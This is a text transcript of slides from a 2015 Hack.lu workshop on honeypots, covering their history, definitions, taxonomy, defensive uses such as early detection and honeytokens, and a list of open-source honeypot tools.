dr. honeypots - hack.luarchive.hack.lu/2015/dr.honeypots_worskhop_hack.lu2015_rist_arcas .pdf ·...
TRANSCRIPT
![Page 1: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/1.jpg)
Dr. Honeypots- How I Learned to Stop Worrying and Love My Enemies -
Guillaume Arcas and Lukas Rist - October 2015
![Page 2: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/2.jpg)
IntroductionTechnologySet-UpCustomizationData AnalysisSzenarios
Agenda
![Page 3: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/3.jpg)
who are we?
![Page 4: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/4.jpg)
Lukas RistLukas is a software engineer with Blue Coat Norway, developing the behavioral malware analysis and back-end systems used to create an extensive threat intelligence database. Whenever that is not challenging enough, he delves into the depths of structured languages for cyber threat intelligence representation sigh, honeypot development and researching ICS/SCADA threats under the umbrella of the Honeynet Project for which he serves as a director. Feel free to ping me @glaslos
![Page 5: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/5.jpg)
Guillaume ArcasGuillaume has worked as Security & Network Analyst since 1997 primarily - but not only - in the Internet & Banking industries. Guillaume then specialized in Digital Forensics & Incident Response and joined Sekoia as CERT team leader. Guillaume is also member of the Honeynet Project’s French Chapter since 2010. When not hunting for endangered species hanging on the Internet, Guillaume uses to read (thriller, SF, History & Philosophy in no particular order as long as it is printed) and walk his dog. He’s also nourishes a certain nostalgia for the esheep.exe software hence his Twitter’s avatar (@y0m).
![Page 6: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/6.jpg)
Everything You Always Wanted to Know About
HoneypotsBut Were Afraid to Ask
![Page 7: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/7.jpg)
A Brief History of Honeypots
![Page 8: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/8.jpg)
1986A long time ago in a
network far far away...
![Page 9: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/9.jpg)
![Page 10: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/10.jpg)
“And so it happened that on my second day at work, Dave wandered into my office, mumbling about a hiccup in the Unix accounting system. Someone must have used a few seconds of computing time without paying for it. The computer's books didn't quite balance; last month's bills of $2,387 showed a 75-cent shortfall.Now, an error of a few thousand dollars is obvious and isn't hard to find. Buterrors in the pennies column arise from deeply buried problems, so finding these bugs is a natural test for a budding software wizard. Dave said that I ought tothink about it.”
![Page 11: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/11.jpg)
![Page 12: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/12.jpg)
"Hey Mike, remember those carrots I left out for bait in January?""You mean those SDI files you concocted?""Yeah," I said. "Well, my dear, sweet, nonexistent secretary just received aletter."
![Page 13: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/13.jpg)
“Pengo, with his contacts to hackers across Germany, knew how to use Hess's information. Carrying Hess's printouts, one of the Berlin hackers crossed into East Berlin and met with agents from the Soviet KGB.
The deal was made: around 30,000 Deutschmarks—$18,000— for printouts and passwords.
The KGB wasn't just paying for printouts, though. Hess and company apparently sold their techniques as well: how to break into Vax computers; which networks to use when crossing the Atlantic; details on how the Milnet operates.
Even more important to the KGB was obtaining research data about Western technology, including integrated circuit design, computer-aided manufacturing, and, especially, operating system software that was under U.S. export control. They offered 250,000 Deutschmarks for copies of Digital Equipment's VMS operatingsystem.”
![Page 14: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/14.jpg)
1991
![Page 15: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/15.jpg)
![Page 16: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/16.jpg)
![Page 17: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/17.jpg)
Honeypot.sh
![Page 18: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/18.jpg)
![Page 19: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/19.jpg)
1999
![Page 20: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/20.jpg)
![Page 21: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/21.jpg)
The Honeynet Project
The Honeynet Project is a leading international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security.With Chapters around the world, our volunteers have contributed to fight against malware (such as Confickr), discovering new attacks and creating security tools used by businesses and government agencies all over the world.
The organization continues to be on the cutting edge of security research by working to analyze the latest attacks and educating the public about threats to information systems across the world.
Our mission reads "to learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned" with three main pillars:
- Research- Awareness- Tools
http://www.honeynet.org/about
![Page 22: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/22.jpg)
What is a Honeypot?
![Page 23: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/23.jpg)
![Page 24: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/24.jpg)
Honeynet Project Definition (2002)
"A honeypot is a single system connected to an existing production network in order to lure attackers."
![Page 25: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/25.jpg)
Honeynet Project Definition (2004)
"A honeypot is a information system resource whose value lies in unauthorized or illicit use of that resource."
![Page 26: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/26.jpg)
ENISA Definition (2012)
"A honeypot is a computing resource whose sole task is to be probed, attacked, compromised, used or accessed in any other unauthorized way. The resource can be of any type: a service, an application, a system or a set of systems or simply just a piece of information or data."
![Page 27: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/27.jpg)
Where?
![Page 28: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/28.jpg)
On the Internet:
- it will generate and collect a lot of noise and often useless information ;
- it can be seen as a metrics of the threat level from the North of the Wall;
- it can help convince the top-management not to decrease IT Security budget.
![Page 29: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/29.jpg)
On internal network:
- if something happens then sh*t hit the fan!- Early Detection Systems for CERT/DFIR teams ;- If something happens there, no need to argue,
to time to lose, you are in trouble and need to investigate.
![Page 30: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/30.jpg)
https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots
![Page 31: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/31.jpg)
Taxonomy
![Page 32: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/32.jpg)
Type of attacked resource
- Server-side honeypot- Client-side honeypot (honeyclient)
![Page 33: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/33.jpg)
Level of interaction
- high-interaction: real system- low-interaction: emulated system- hybrid: mix of low & high
![Page 34: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/34.jpg)
http://www.mcs.vuw.ac.nz/comp/Publications/archive/CS-TR-06/CS-TR-06-12.pdf
![Page 35: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/35.jpg)
https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots
![Page 36: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/36.jpg)
https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots
![Page 37: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/37.jpg)
Why?
![Page 38: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/38.jpg)
![Page 39: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/39.jpg)
Early Awareness & Detection System with Reduced False Positives
![Page 40: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/40.jpg)
In a production environment, some things may be suspicious.
![Page 41: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/41.jpg)
Someone successfully connects to a server at unusual time from India:
- it can be your newly appointed offshore IT management service provider performing usual tasks;
- it can be a SysAdmin connecting from his/her vacation place because of an emergency.
![Page 42: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/42.jpg)
… Or some Chinese hacker from the PLA Unit 61398
![Page 43: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/43.jpg)
In a honeypot or a honeynet environment, everything is
suspicious by nature.
![Page 44: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/44.jpg)
Someone successfully connects to a honeypot from anywhere at any time:
- it can be an intruder performing lateral movements;
- it can be an insider or a too curious authorized user;
- it can be your internal Red Team.
![Page 45: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/45.jpg)
… Or some Chinese hacker from the PLA Unit 61398
![Page 46: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/46.jpg)
In a production environment, you can not monitor/log/store everything:
- cost & storage constraints- legal constraints
![Page 47: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/47.jpg)
In a honeypot or honeynet, you must and can monitor/log/store everything:
- network traffic- uploaded files- system logs
![Page 48: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/48.jpg)
Honeypots & the Intrusion Kill Chain
![Page 49: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/49.jpg)
![Page 50: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/50.jpg)
A honeypot can drastically help detecting adversary’s
Reconnaissance actions.
![Page 51: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/51.jpg)
Counter-OSINT:
- A fake LinkedIn profile, Facebook page, email addresses published on corporate website (can be hidden in HTML comments so not visible from usual visitors), fake "leaked credentials" on pastebin, fake DB dumps posted on underground forums, etc. can increase visibility on howthe attacker found his/her targets.
- Fake password hash loaded in memory to detect use of password stealers like Mimikatz.
![Page 52: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/52.jpg)
How?
![Page 53: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/53.jpg)
Critical points
- Monitor/Collect/Store Data- Allow/Forbid/Restrict access to
the Internet
![Page 54: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/54.jpg)
Collecting Data
- You’ll have to answer this question:
“How can I monitor an intruder with privileged access (aka: root/administrator|system users
rights) without being detected/defeated?
![Page 55: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/55.jpg)
Internet Acccess
- What kind of Internet access will you grant from the honeypot? If Internet
access is too limited, the intruder can find no interest in staying any longer.
![Page 56: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/56.jpg)
Avoid Detection
![Page 57: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/57.jpg)
![Page 58: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/58.jpg)
![Page 59: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/59.jpg)
Skills
![Page 60: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/60.jpg)
What skills do you need?
- Network Forensics- System Forensics- Reverse Engineering- Data Analysis- Coding
![Page 61: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/61.jpg)
Honeypots Arsenal
![Page 62: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/62.jpg)
![Page 63: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/63.jpg)
High-Interaction Server-Side Honeypots
- Argos- HiHAT- SSH: Bifrozt, DockPot, HonSSH
![Page 64: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/64.jpg)
Low-Interaction Server-Side Honeypots
- General purpose: Dionaea, Honeyd, Honeytrap- Web Application: Glastopf, GoogleHack Honeypot- SSH: Kippo- Scada: ConPot- VoIP: Atermisa- Sinkholes: HoneySink- USB: Ghost USB honeypot
![Page 65: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/65.jpg)
High-Interaction Client-Side Honeypots
- Shelia- Capture-HPC NG
Low-Interaction Client-Side Honeypots
- Thug- PhonyeC
![Page 66: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/66.jpg)
Hybrid Honeypots
- HoneySpider- SURFcert IDS- SSH: Bifrozt
![Page 67: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/67.jpg)
Honeytokens
- a honeytoken is a piece of data that should not be accessed through normal activity, i.e. does not have any production value, any access must be intentional, which means it is likely to be an unauthorised act. (ENISA)
- http://www1.cs.columbia.edu/~angelos/Papers/2009/DecoyDocumentsSECCOM09.pdf- http://seclists.org/focus-ids/2003/Feb/95
